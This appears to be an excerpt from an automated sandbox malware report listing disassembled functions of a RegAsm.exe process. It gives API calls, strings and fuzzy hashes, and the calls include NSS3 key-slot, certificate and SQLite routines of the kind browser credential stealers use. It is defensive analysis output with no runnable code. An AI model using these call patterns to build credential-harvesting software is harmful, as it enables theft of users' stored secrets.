                                                                                                                                                                                                                                                                  • Instruction ID: 16936d27553e3f3333669c107e9d5995ed17cbada246e9f94fc0bad289236bdf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31d244d78756d72c4f0cbef9d0c64589c5f562ce78cc967097005f2a4219adf1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9C14971904248EADB15EBE5D956BEDBBB4AF15308F2440BEE406735C2EB781B0CCB25
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heaplstrlenstrchr$AllocH_prologProcessstrcpy_s
                                                                                                                                                                                                                                                                  • String ID: 0123456789ABCDEF
                                                                                                                                                                                                                                                                  • API String ID: 1978830238-2554083253
                                                                                                                                                                                                                                                                  • Opcode ID: 8ab548956084e1ff4340cca3afd96787ef595e383a3a2f368295c4c627d6037d
                                                                                                                                                                                                                                                                  • Instruction ID: df0bb20226c3b77e0592191fdf3089e6707ad72a6792d302173453345bb88c00
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ab548956084e1ff4340cca3afd96787ef595e383a3a2f368295c4c627d6037d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13310272600615AFDB04EFAADC81AAF7BA9EF49350F00007EF901EB1D0DE389900CB64
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C92FCBD
                                                                                                                                                                                                                                                                  • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C92FCCC
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C92FCEF
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C92FD32
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C92FD46
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000001), ref: 6C92FD51
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C92FD6D
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C92FD84
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                                                  • API String ID: 183580322-336475711
                                                                                                                                                                                                                                                                  • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                                                                  • Instruction ID: b909d11fdaf800c2f8aca72ba753bb54c30d962a8d3d7db262d6262b607436d9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D31F1B2D102259BEB008AB4DC05BAF77ACAF5071CF190135DC94A7B05E77AE918C7D2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(C_DigestInit), ref: 6C946C66
                                                                                                                                                                                                                                                                  • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C946C94
                                                                                                                                                                                                                                                                  • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C946CA3
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA2D963
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(?,00000000), ref: 6C946CB9
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C946CD5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                  • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                                                                                                                                                                                                                                  • API String ID: 1003633598-3690128261
                                                                                                                                                                                                                                                                  • Opcode ID: 39eb90cd478a03278ac6b93fd195dbe7becf2680118fd3dd67100209b7de9d4a
                                                                                                                                                                                                                                                                  • Instruction ID: a00f7679c1f094a9c80c7a4062eff62239f2c1450678147aac8f79f1a45cf707
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39eb90cd478a03278ac6b93fd195dbe7becf2680118fd3dd67100209b7de9d4a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16212574B00225DFCB059F549D48B9A3BB5FB52319F08C029E509D7B02DB34D84ACBB1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SECITEM_ArenaDupItem_Util.NSS3(?,6C917D8F,6C917D8F,?,?), ref: 6C916DC8
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C96FE08
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C96FE1D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C96FE62
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C917D8F,?,?), ref: 6C916DD5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA38FA0,00000000,?,?,?,?,6C917D8F,?,?), ref: 6C916DF7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA418D0,?), ref: 6C96B095
                                                                                                                                                                                                                                                                  • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C916E35
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C96FE29
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C96FE3D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C96FE6F
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C916E4C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97116E
                                                                                                                                                                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA38FE0,00000000), ref: 6C916E82
                                                                                                                                                                                                                                                                    • Part of subcall function 6C916AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C91B21D,00000000,00000000,6C91B219,?,6C916BFB,00000000,?,00000000,00000000,?,?,?,6C91B21D), ref: 6C916B01
                                                                                                                                                                                                                                                                    • Part of subcall function 6C916AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C916B8A
                                                                                                                                                                                                                                                                  • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C916F1E
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C916F35
                                                                                                                                                                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA38FE0,00000000), ref: 6C916F6B
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,6C917D8F,?,?), ref: 6C916FE1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 587344769-0
                                                                                                                                                                                                                                                                  • Opcode ID: 89911e971a83e6b3a46336248b2b683ec4aafcc773d4c863c0d23f7346fb45df
                                                                                                                                                                                                                                                                  • Instruction ID: cefa9582fdfb79ea412f56ca255adf1a4c1b2ef9611e671c7f225ea7ff8aacc0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89911e971a83e6b3a46336248b2b683ec4aafcc773d4c863c0d23f7346fb45df
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7718E71D1424A9FEB00CF15CD51BAABBA8FFA4348F154269E848D7B11F770E9A4CB90
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C93AB7F,?,00000000,?), ref: 6C934CB4
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C,?,6C93AB7F,?,00000000,?), ref: 6C934CC8
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,6C93AB7F,?,00000000,?), ref: 6C934CE0
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,6C93AB7F,?,00000000,?), ref: 6C934CF4
                                                                                                                                                                                                                                                                  • PL_HashTableLookup.NSS3(?,?,?,6C93AB7F,?,00000000,?), ref: 6C934D03
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,00000000,?), ref: 6C934D10
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                                                                                                                                  • PR_Now.NSS3(?,00000000,?), ref: 6C934D26
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DC6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DD1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D9DED
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C934D98
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C934DDA
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C934E02
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4032354334-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7372963e0a98586a839d80cd84effa52dbbb63c947728711b41028172f913175
                                                                                                                                                                                                                                                                  • Instruction ID: a9fbf668a7fdc7bac6c5bbabc2ad9117ce066c0013af967b548e04412f4fde8c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7372963e0a98586a839d80cd84effa52dbbb63c947728711b41028172f913175
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B41C9B6A00211ABDB01AF24EC40A667BB8FF2521DF065170EC1C87B15FB36E954CBE1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • sqlite3_initialize.NSS3 ref: 6C8FFD18
                                                                                                                                                                                                                                                                  • sqlite3_initialize.NSS3 ref: 6C8FFD5F
                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C8FFD89
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C8FFD99
                                                                                                                                                                                                                                                                  • sqlite3_free.NSS3(00000000), ref: 6C8FFE3C
                                                                                                                                                                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C8FFEE3
                                                                                                                                                                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C8FFEEE
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                                                                                                                                                                                                                  • String ID: simple
                                                                                                                                                                                                                                                                  • API String ID: 1130978851-3246079234
                                                                                                                                                                                                                                                                  • Opcode ID: b54adfbc81b99d59c34fa68031788be387af1e401b854bc28757e651172597b1
                                                                                                                                                                                                                                                                  • Instruction ID: 4c932ec62554958ae9ec02eba562c22e126b226147a5e86ead2cfe5c1043caec
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b54adfbc81b99d59c34fa68031788be387af1e401b854bc28757e651172597b1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D59183B0A012058FDB14CF59CA80A6AB7F1FF94398F25C968D8299F752D731E842CF60
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C905EC9
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C905EED
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • misuse, xrefs: 6C905EDB
                                                                                                                                                                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C905EE0
                                                                                                                                                                                                                                                                  • invalid, xrefs: 6C905EBE
                                                                                                                                                                                                                                                                  • unable to close due to unfinalized statements or unfinished backups, xrefs: 6C905E64
                                                                                                                                                                                                                                                                  • API call with %s database connection pointer, xrefs: 6C905EC3
                                                                                                                                                                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C905ED1
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: sqlite3_log
                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                                                                                  • API String ID: 632333372-1982981357
                                                                                                                                                                                                                                                                  • Opcode ID: b64a2ca23bb3db1089f8f462a342ab3390fb590707d86a588500347200e23f38
                                                                                                                                                                                                                                                                  • Instruction ID: a74f9ad38f928cbc08a9af06f3297815718614b03d58e6f0c053ff1e7d7fb00d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b64a2ca23bb3db1089f8f462a342ab3390fb590707d86a588500347200e23f38
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2081F030B056129BEB19CF29C848B6A77B9BF4130CF29426ED8155BB50D734EC52CBD9
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8EDDF9
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8EDE68
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8EDE97
                                                                                                                                                                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C8EDEB6
                                                                                                                                                                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8EDF78
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                  • API String ID: 1526119172-598938438
                                                                                                                                                                                                                                                                  • Opcode ID: 5cf966b181e4ac51bdeb928b545ca13e3c68a7475327642210fc2e9bcfa74450
                                                                                                                                                                                                                                                                  • Instruction ID: cd72f6c98dc4ebcc484477fdf54b0d476a49ceb168797ae86a6e2e1c078199c0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cf966b181e4ac51bdeb928b545ca13e3c68a7475327642210fc2e9bcfa74450
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9381A6717047119FD724CF25CA80B6A77F1BF8A309F158C2EE8598BA51E731E849C752
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103FD
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00410408
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410413
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041041E
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414DB8,?,00000000,?,Display Resolution: ,00000000,?,00426668,00000000,?), ref: 0041042A
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414DB8,?,00000000,?,Display Resolution: ,00000000,?,00426668,00000000,?,00000000), ref: 00410431
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410443
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                                                                                  • String ID: %dx%d
                                                                                                                                                                                                                                                                  • API String ID: 3940144428-2206825331
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C95CD08
                                                                                                                                                                                                                                                                  • PK11_DoesMechanism.NSS3(?,?), ref: 6C95CE16
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C95D079
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1351604052-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C9597C1,?,00000000,00000000,?,?,?,00000000,?,6C937F4A,00000000), ref: 6C94DC68
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970BE0: malloc.MOZGLUE(6C968D2D,?,00000000,?), ref: 6C970BF8
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970BE0: TlsGetValue.KERNEL32(6C968D2D,?,00000000,?), ref: 6C970C15
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C94DD36
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C94DE2D
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C94DE43
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C94DE76
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C94DF32
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C94DF5F
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C94DF78
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C94DFAA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1886645929-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C923C76
                                                                                                                                                                                                                                                                  • CERT_DestroyCertificate.NSS3(00000000), ref: 6C923C94
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9195B0: TlsGetValue.KERNEL32(00000000,?,6C9300D2,00000000), ref: 6C9195D2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9195B0: EnterCriticalSection.KERNEL32(?,?,?,6C9300D2,00000000), ref: 6C9195E7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9195B0: PR_Unlock.NSS3(?,?,?,?,6C9300D2,00000000), ref: 6C919605
                                                                                                                                                                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C923CB2
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C923CCA
                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C923CE1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C923090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C93AE42), ref: 6C9230AA
                                                                                                                                                                                                                                                                    • Part of subcall function 6C923090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9230C7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C923090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C9230E5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C923090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C923116
                                                                                                                                                                                                                                                                    • Part of subcall function 6C923090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C92312B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C923090: PK11_DestroyObject.NSS3(?,?), ref: 6C923154
